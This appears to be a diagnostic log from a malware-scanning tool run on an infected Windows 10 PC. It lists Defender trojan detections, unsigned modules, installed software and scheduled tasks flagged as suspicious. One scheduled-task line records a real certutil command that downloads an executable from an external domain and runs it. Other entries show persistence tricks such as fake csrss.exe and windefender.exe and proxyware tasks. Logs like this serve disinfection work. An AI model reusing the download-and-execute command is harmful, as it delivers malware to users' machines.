Type de blocage : Cross-thread
Error: (02/03/2019 10:17:10 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 10:00:27 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 09:59:55 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 07:57:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante cloudnet.exe, version : 7.2.1.1, horodatage : 0x5c56f8a8
Nom du module défaillant : ntdll.dll, version : 10.0.17763.194, horodatage : 0xf3450dbf
Code d’exception : 0xc0000374
Décalage d’erreur : 0x000e0e23
ID du processus défaillant : 0x2c54
Heure de début de l’application défaillante : 0x01d4bbcf16628093
Chemin d’accès de l’application défaillante : C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : b0515ac7-bd35-4c2f-9f50-c2e1c2304abc
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Error: (02/03/2019 07:55:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme mingw-get-setup.exe version 0.603.24357.1 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : c090
Heure de début : 01d4bbd3824a126f
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Users\yassine\Desktop\mingw-get-setup.exe
ID de rapport : d9e1385a-ffb5-46b3-a7a8-4dbc76a0a4b1
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
Type de blocage : Top level window is idle
Error: (02/03/2019 07:54:04 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 05:56:42 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Erreurs système:
=============
Error: (02/04/2019 06:54:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00041402-0001-0000-D4F6-D20500000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 06:54:07 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00031402-0001-0000-D4F6-D20500000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 06:50:33 PM) (Source: DCOM) (EventID: 10005) (User: AUTORITE NT)
Description: DCOM a reçu l’erreur « 1053 » lors de la tentative de démarrage du service camsvc avec les arguments « Non disponible » pour exécuter le serveur :
Windows.Internal.CapabilityAccess.Management.CapabilityConsentManager
Error: (02/04/2019 06:50:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Gestionnaire d’accès aux fonctionnalités n’a pas pu démarrer en raison de l’erreur :
Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle.
Error: (02/04/2019 06:50:33 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la connexion du service Service Gestionnaire d’accès aux fonctionnalités.
Error: (02/04/2019 12:03:12 AM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: Le serveur {1F87137D-0E7C-44D5-8C73-4EFFB68962F2} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 12:01:02 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Microsoft.OneConnect_5.1809.2571.0_x64__8wekyb3d8bbwe!App.AppXe8pdgw5syxe8pgccbk3mcn5hanwamr0e.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 12:00:08 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00101402-0001-0000-BC45-B70100000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Windows Defender:
===================================
Date: 2019-02-03 16:26:03.766
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Occamy.C&threatid=2147726780&enterprise=0
Nom : Trojan:Win32/Occamy.C
ID : 2147726780
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Program Files (x86)\OVER\699089283.exe; file:_C:\Program Files\windows nt\48BAADK4HSCLXTEJCV8DNDP9\rkNS+7X#TO.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\bonhhfdbonp; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\OMEWPRODUCT_; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\bonhhfdbonp; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\OMEWPRODUCT_
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Utilisateur
Utilisateur : DESKTOP-6CA5L0V\yassine
Nom du processus : Unknown
Version de la signature : AV: 1.285.776.0, AS: 1.285.776.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:47:30.555
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Nom : Trojan:Win32/Fuerboos.C!cl
ID : 2147723654
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\yassine\AppData\Local\Temp\E81.tmp.exe
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:47:30.546
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=!#UACTrigger.A&threatid=268476516&enterprise=0
Nom : !#UACTrigger.A
ID : 268476516
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:42:43.226
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=!#UACTrigger.A&threatid=268476516&enterprise=0
Nom : !#UACTrigger.A
ID : 268476516
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Fournisseur AMSI UAC
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:42:43.225
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Nom : Trojan:Win32/Fuerboos.C!cl
ID : 2147723654
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Fournisseur AMSI UAC
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-02 16:47:37.301
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-02-02 16:47:37.300
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Logiciel anti-espion
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-02-02 16:47:37.299
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-01-29 11:37:58.229
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.3579.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu
Date: 2019-01-29 11:37:58.229
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.3579.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Logiciel anti-espion
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu
CodeIntegrity:
===================================
Date: 2019-01-23 21:36:40.254
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SearchIndexer.exe) attempted to load \Device\HarddiskVolume4\ProgramData\Polygen\DingZuntam.dll that did not meet the Microsoft signing level requirements.
Date: 2019-01-23 19:41:56.297
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.292
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.281
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.198
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz
Pourcentage de mémoire utilisée: 53%
Mémoire physique - RAM - totale: 3985.27 MB
Mémoire physique - RAM - disponible: 1853.17 MB
Mémoire virtuelle totale: 7697.27 MB
Mémoire virtuelle disponible: 5383.14 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:445.73 GB) (Free:317.71 GB) NTFS
\\?\Volume{7b4a6d6f-cf6d-494b-982e-33327e5cb2c1}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{9572eb2f-4073-40e8-ba57-61f49b08fcfe}\ () (Fixed) (Total:0.5 GB) (Free:0.47 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: A944F590)
Partition: GPT.
==================== Fin de Addition.txt ============================
Exécuté par yassine (04-02-2019 19:04:11)
Exécuté depuis C:\Users\yassine\Documents
Windows 10 Pro Version 1809 17763.253 (X64) (2018-12-05 18:42:23)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-1848641037-2696689444-97599420-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1848641037-2696689444-97599420-503 - Limited - Disabled)
Invité (S-1-5-21-1848641037-2696689444-97599420-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1848641037-2696689444-97599420-504 - Limited - Disabled)
yassine (S-1-5-21-1848641037-2696689444-97599420-1001 - Administrator - Enabled) => C:\Users\yassine
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Autodesk Fusion 360 (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.5103 - Autodesk, Inc.)
CodeBlocks (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\CodeBlocks) (Version: 17.12 - The Code::Blocks Team)
Dassault Systemes Software B20 (HKLM\...\Dassault Systemes B20_0) (Version: - )
Dassault Systemes Software Prerequisites x86-x64 (HKLM\...\{CF1EB598-B424-436A-B15F-B763846BA970}) (Version: 8.1.3 - Dassault Systemes)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
MATLAB R2018a (HKLM\...\Matlab R2018a) (Version: 9.4 - MathWorks)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\OneDriveSetup.exe) (Version: 18.240.1202.0004 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 65.0 (x64 fr) (HKLM\...\Mozilla Firefox 65.0 (x64 fr)) (Version: 65.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 63.0.3 - Mozilla)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.7.0 - Microleaves) Hidden <==== ATTENTION
Proteus 8 Professional (HKLM-x32\...\{A686E9C2-C318-4FA0-BAC2-D6FDA2E1B556}) (Version: 8.1.17358.0 - Labcenter Electronics)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-1848641037-2696689444-97599420-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1848641037-2696689444-97599420-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\yassine\AppData\Local\Autodesk\webdeploy\production\9ab85d23c78fa67a064eed38018e8b8f60a8f219\NPreview10.dll (Autodesk, Inc. -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2015-07-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0670B5D0-08E8-40D4-B987-6FD70256FBB8} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-11] (Google Inc -> Google Inc.)
Task: {1000EAEA-13F9-4D28-9E38-A31294ED73D6} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2019-01-23] ()
Task: {10559CF6-1747-489A-9539-71845EEE9486} - System32\Tasks\Opera scheduled Autoupdate 1546272161 => C:\Users\yassine\AppData\Local\Programs\Opera\launcher.exe
Task: {12B57700-BE0F-4089-8A67-9A3C50438388} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {202BE625-0740-44B2-BD30-84A98E5B297D} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2019-01-23] (AVG Technologies USA, Inc. -> AVG Technologies CZ, s.r.o.)
Task: {33499D1C-41BE-4A7E-A01E-91E09DFABAF2} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {3455A150-928E-4E1D-BF3D-CBB63FE0438D} - System32\Tasks\AutoRearm => C:\Windows\AutoRearm\AutoRearm.exe [2019-01-23] ()
Task: {3FA299A2-C514-46C9-96ED-1C8CBD536033} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {42DB81F6-14FF-41F4-9F82-5CE9DF6DCD0E} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-23] () <==== ATTENTION
Task: {458541EB-F763-4A75-A52A-9822CC7EE8D2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-19] (AVAST Software s.r.o. -> AVAST Software)
Task: {5F23D47A-7399-411B-A771-097B7CBBE893} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {6291BFE9-F2AD-4A7C-B4BE-1BE93394156F} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {683CE07F-C3E2-45CB-A461-F1F5D1E90E3F} - System32\Tasks\Opera scheduled assistant Autoupdate 1546272165 => C:\Users\yassine\AppData\Local\Programs\Opera\launcher.exe
Task: {6CFEFB12-9853-46AE-94A2-45E69FE41161} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {76A90BCB-DF31-4355-A682-9492E58412E4} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\yassine\AppData\Roaming\Microsoft\Windows\shefjrgc\wieatttg.exe [2018-09-15] ()
Task: {7CF8080C-7544-4CDE-8D4F-7C9ADA9218D3} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-11-02] (MICROLEAVES LTD -> Microleaves) <==== ATTENTION
Task: {81F507F5-0DF8-4A90-9800-07D21E7506B2} - System32\Tasks\Time Trigger Task => C:\Users\yassine\AppData\Local\4db6a491-c473-4d68-bbbe-621a79d406bf\E81.tmp.exe [2019-02-03] ()
Task: {8F6327CC-912D-4C46-9924-CBBE7C00CCB4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {99FFD275-313B-45C8-A8F1-80F165EE3E29} - System32\Tasks\I-9-1-66-1041700351-1193898365-1395117793-5203\{VHO4HVDT-642T-21BT-MGY2-DFPTVFPK2LN} => C:\Users\yassine\AppData\Roaming\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.17763.253_pt-pt_296d5f41fcf8282b\embeddedmodesvcapi.exe
Task: {A42E486A-B2D3-4A06-B9E9-9B531ABD8A3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-11] (Google Inc -> Google Inc.)
Task: {A5044050-3F43-4DCF-A24A-12B5CDB84A59} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {AA61CC88-15AB-4F69-BD7C-41CA24CED994} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor)
Task: {ABE47F29-6F18-411E-AA54-D054DE264FAE} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {AEB2E3E1-1597-4658-BCF0-51E06333C105} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor)
Task: {E39F8E32-F4B6-44B2-B8AF-D84A6CFEB7B8} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-09-15] (Microsoft Windows -> )
Task: {EAC18E13-6BE9-4822-9CF0-876DD3A21C70} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://andreysharanov.info/app/app.exe C:\Users\yassine\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\yassine\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {F1DAFAAD-B7E8-45C6-9876-484B31485CE3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-10] (Microsoft Corporation -> Microsoft Corporation)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
==================== Raccourcis & WMI ========================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
==================== Modules chargés (Avec liste blanche) ==============
2019-02-03 15:35 - 2019-02-03 15:35 - 001435136 ____H () C:\Windows\windefender.exe
2018-09-15 08:28 - 2018-09-15 08:28 - 000834088 _____ () C:\Windows\SYSTEM32\inputhost.dll
